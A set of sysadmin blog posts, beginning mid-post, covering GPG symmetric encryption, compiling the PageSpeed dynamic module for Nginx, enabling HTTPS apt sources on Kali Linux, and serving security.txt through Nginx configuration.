By default, GPG will use AES256 cipher for encryption. However, you can change the cipher algorithm by supplying --cipher-also CIPHER option.

To Encrypt:

$ gpg --output encrypted.data --symmetric --cipher-algo AES256 un_encrypted.data

To Decrypt:

$ gpg --output un_encrypted.data --decrypt encrypted.data

Note: You will be prompted for a password when encrypting or decrypt.

What is Google PageSpeed?

Pagespeed is a set of modules that designed to help optimize websites and performance by applying optimization to pages and static assets such as minifying stylesheets, javascript, images recompression and HTML files thus, improve page performance. Google's PageSpeed Insight is a tool to help analyze website and suggest an improvement based on results.

Pagespeed module can be built to be use with Apache and Nginx webserver, however this post shows how to use with Nginx webserver.

To use the Pagespeed with Nginx, you have two options, either:

1. Compile and build Nginx package with support for PageSpeed, then compile PageSpeed. Or,
2. Compile PageSpeed as a dynamic module to be use with Nginx.

In the first option, I not really recommend because when you build the Nginx package from source, it also means if there is an update, you need to redo the whole things with the new updated package. And also you have to keep in mind to hold the build from apt, to prevent automatic update and lost your current build.

The second option, we just build the PageSpeed dynamic module and load them with Nginx. If new PageSpeed module comes in, we just have to build the module itself only and not disturbing your current Nginx or configuration. Or if Nginx push a new update, you need to re-build the module to be compatible with the newer version.

Make sure you're using Nginx version 1.11.5 and later to do this because older version doesn't support --with-compat option when configure the module. If you're using nginx older than this, then I suggest to use Nginx pre-built package from mainline version as it has more features than stable release.

Either of the options above, I suggest you to built this module on dev machine. So that if you break the setup, it doesn't break your current system. Make sure your dev machine are same as the production machine, by that means the OS and version are need to be same. Here, I'm using Ubuntu 16.04 as example.

This guide is based on Google's manual install instruction. I'm going to show you how to build nginx pagespeed module to be used with Nginx web server.

Steps

I made a simple script here to help automate the process. The script is still in experimental, use with cautious!. Else, follow the steps below:

1. Update your system packages, to make sure you download the latest version of required software.

sudo apt update

2. Install Nginx and build dependency. This is required to build the module.

sudo apt-get install build-essential uuid-dev unzip gcc make libpcre3 libpcre3-dev zlib1g-dev nginx -y

3. Get Nginx version number. Make sure your Nginx version is 1.11.5 or later. If your Nginx version is not compatible, you can try using Nginx Mainline repository.

nginx -v

4. Download Nginx source from web.

wget http://nginx.org/download/nginx-{your-version-number}.tar.gz

5. Get the latest version number pagespeed module at https://modpagespeed.com/doc/release_notes
6. Download the latest version ngx_pagespeed module at github and extract it. https://github.com/apache/incubator-pagespeed-ngx/archive/v{ngx_pagespeed_module_version}-stable.zip
7. Change directory to incubator-pagespeed and download PageSpeed Optimization Library (psol). https://dl.google.com/dl/page-speed/psol/{ngx_pagespeed_module_version}-x64.tar.gz
8. Extract the downloaded package.

tar -xzf $(basename ${psol_url})  # extracts to psol
rm -r $(basename ${psol_url})

9. Change directory to Nginx source folder and compile the Pagespeed Dynamic module. Run the configure script with the --with-compat argument to make the dynamic module binary‑compatible with Nginx. Then run make modules to compile just the module.

./configure --add-dynamic-module=../incubator-pagespeed-ngx-{ngx_pagespeed_module_version}-stable --with-compat
make modules

After done make, the object module are available in folder obj/ngx_pagespeed.so. This module now can be transfer to production server.

Folder structure

Now you need to copy the module to a folder then load them in a config file. Different distribution may have different nginx module folder, modules-available and modules-enabled directory. Some put in /usr/share/nginx/modules, /usr/lib/nginx/modules or even /etc/nginx/modules. Check those directories and symlinks if available.

My distribution has the following structure: (x links to y)

/etc/nginx/modules -> /usr/lib/nginx/modules -> /usr/share/nginx/modules
/etc/modules-enabled -> /usr/share/nginx/modules-available

The nginx folder structure symlinked to other directories makes changes a bit confusing. What I do is gather all modules together in one place in /etc/nginx/modules (no symlinks) and remove any trace folder such in /usr/share/nginx/modules or /usr/lib/nginx/modules.

10. If you don't have the folder structure like above, create new directory as below. These are the folder structure you need to have (as what I do):

/etc/nginx/modules           # This is where you placed all your modules (.so file)
/etc/nginx/modules-available # Here where you create a conf file and link to the module
/etc/nginx/modules-enabled   # Symlink any module(s) from `/etc/nginx/modules-available` you want to enable in this folder

11. Copy the ~/nginx-{your-version}/objs/ngx_pagespeed.so to /etc/nginx/modules/ngx_pagespeed_{ngx_pagespeed_version}.so. I suggest to append the ngx_pagespeed_version at the module, so if the newer version comes, you know to identify the module version.

12. Create /etc/nginx/modules-available/ngx_pagespeed.conf file and place this in the configuration. The 'load_module' directives is used to load the PageSpeed as a dynamic module.

# rename your ngx_pagespeed version!
load_module /etc/nginx/modules/ngx_pagespeed_1.13.35.2.so;

13. To enable the module, symlink the /etc/nginx/module-available/ngx_pagespeed.conf to /etc/nginx/modules-enabled/ngx_pagespeed.conf.

sudo ln -s /etc/nginx/module-available/ngx_pagespeed.conf /etc/nginx/modules-enabled/ngx_pagespeed.conf

14. Check in the nginx.conf, make sure to load all modules from /etc/nginx/modules-enabled/*.conf. If not, place this at the top‑level ("main") context of the nginx.conf configuration file (that is, not in the http or stream contexts).

include /etc/nginx/modules-enabled/*.conf;

15. What ever you do, make sure you have load the module in nginx configuration. Check everything if syntax is okay:

sudo nginx -t

If everything is good, you've successful load the module with Nginx! Proceed to configuration.

Configuration

16. Create a folder name 'snippets' in /etc/nginx/. In this folder, we will put our pagespeed configuration file here, and will be include in virtual host conf.

sudo mkdir /etc/nginx/snippets

These are the configuration that we're going to use for the pagespeed module. You can refer here for more info. Place this in /etc/nginx/snippets/pagespeed.conf.

    ## pagespeed module ##
    pagespeed on;
    
    # Honoring Content-Security-Policy Headers
    pagespeed HonorCsp on;

    # Lower-casing HTML element and attribute names
    pagespeed LowercaseHtmlNames on;

    # Pagespeed Header
    pagespeed XHeaderValue "Powered By ngx_pagespeed"; 

    # Needs to exist and be writable by nginx.  Use tmpfs for best performance.
    pagespeed FileCachePath /var/ngx_pagespeed_cache;

    # Ensure requests for pagespeed optimized resources go to the pagespeed handler
    # and no extraneous headers get set.
    location ~ "\.pagespeed\.([a-z]\.)?[a-z]{2}\.[^.]{10}\.[^.]+" {
       add_header "" "";
    }
    location ~ "^/pagespeed_static/" { }
    location ~ "^/ngx_pagespeed_beacon$" { }

Include to Virtual Host

After done writing the pagespeed.conf snippet, go to sites-enabled folder and open your site conf. In server block or http block, include the snippet to the configuration. If you have multiple sites enabled, you must include this to every sites configuration to enable pagespeed on every sites.

include /etc/nginx/snippets/pagespeed.conf;

Validate

Check if all the configurations are correct. If everything is okay, restart nginx service to load the PageSpeed module into the running instance.

sudo nginx -t
sudo service nginx restart

Check if Pagespeed is running by using the curl command:

$ curl -I https://www.metahackers.pro 
HTTP/2 200 
date: Mon, 30 Apr 2018 00:46:54 GMT
content-type: text/html; charset=utf-8
set-cookie: __cfduid=d42ff6730fdae50d33c6d3f29a2c593231525049214; expires=Tue, 30-Apr-19 00:46:54 GMT; path=/; domain=.metahackers.pro; HttpOnly; Secure
x-powered-by: Express
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
referrer-policy: strict-origin-when-cross-origin
x-page-speed: Powered By ngx_pagespeed
cache-control: max-age=0, no-cache
strict-transport-security: max-age=15552000; includeSubDomains; preload
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
server: cloudflare
cf-ray: 4135fe768d0c110b-SIN

It should have output the X-page-speed header. Also check Pagespeed Insights for website performance test. PageSpeed Insights is a seperate tool from Google to test website performance and level of optimization for both desktop and mobile devices. It is a handy tool for measuring your site and for indicate the efficacy of the PageSpeed module.

You can use PageSpeed Insights to compare your site score and recommendation for optimization with and without PageSpeed enabled. Swap between the pagespeed on; and pagespeed off; directives to measure the effectiveness of the PageSpeed module on your site.

PageSpeed applies its optimizations without any further configuration or tuning. However, if you want to have more control over which optimizations are performed on your site, refer to the PageSpeed documentation.

Since last year 2017, Kali Linux now support HTTPS transport in their repositories, but since we're using mirrors, not all mirrors do support HTTPS transport. Thus it MAY affects the download speed the reason that, you may be redirected to a mirrors that far from you and less optimized server will be served to you.

As it says in Kali blog:

As moving to an apt HTTPS transport does not provide much extra security, do so only if you feel you must!

This because the APT verifies the signature of the packages before sending to you and if an atacker modifies the files you're downloading, this will be noticed by checksum mismatch or something.

A quote from askubuntu page:

Using a signature verification is better than using an HTTPS connection, because it'll detect an attack on the server you're downloading from, not just an attack in transit.

Use apt-get with HTTPS

To use apt-get with HTTPS, you can do so by specify https:// URLs in /etc/apt/sources.list and /etc/apt/sources.list.d/*, then APT will use HTTPS.

# The Official Kali Rolling Repository
deb https://http.kali.org/kali kali-rolling main contrib non-free

# For source package access, uncomment the following line
#deb-src https://http.kali.org/kali kali-rolling main contrib non-free

Then, run apt-get update to update your local repositories with https.

Why use HTTPS in APT transport?

Some programs can mess up this apt traffic, or viewing what package you download, etc.

Since Kali provide HTTPS in apt transport, why not use it? The apt itself without HTTPS does have a data tamper protection by built-in signature verification. However, the connection itself is not encrypted.

Encryption in transport would prevent eavesdroppers (such as your ISP) from being able to see what you are downloading. If you need privacy about what particular packages you're downloading, HTTPS is a must.

What is security.txt?

Well basically when someone (security researcher) found a bug or vulnerability on your web application, this piece of text helps where to contact your security team, or proper way to report to.

Here you can find everything about what I am talking about if I don't make sense. Please check out and generate your security.txt, come back here and follow steps below to put on your web server.

Note: For non Nginx user

Steps I shown here are to apply to Nginx webserver since I like Nginx and use Nginx a lot. If you're using other than Nginx, (such as Apache) your configuration might liking and similar. Try looking at your web server documentation for syntax and configuration.

Lets get started!

I assume you already have your security.txt by make one or generate from the website. Edit the information to your liking and policies. Security.txt is placed on your web root.

Place security.txt in web root, such /var/www/myweb/.security.txt. In your /etc/nginx/sites-enabled/{your-site}.conf, add this in server block. The code itself self explanatory, which redirect a request URI '/security.txt' to '/.well-known/security.txt'. The content of security.txt itself given as alias to security.txt in your web root.

    ## security.txt implementation ##
    location /security.txt {
        return 301 http://$host/.well-known/security.txt;
    }
    
    location = /.well-known/security.txt {
        alias /var/www/ghost/.security.txt;
    }

When user navigate to https://myweb.com/security.txt it will be redirected 301 to https://myweb.com/.well-known/security.txt while the file itself is actualy in your web root. And of course, the user can also look for security.txt in uri /.well-known/security.txt.

If you have other better solutions or suggestion, please comment below!

Security Txt:
https://securitytxt.org/
https://github.com/securitytxt/security-txt/blob/master/draft-foudil-securitytxt.md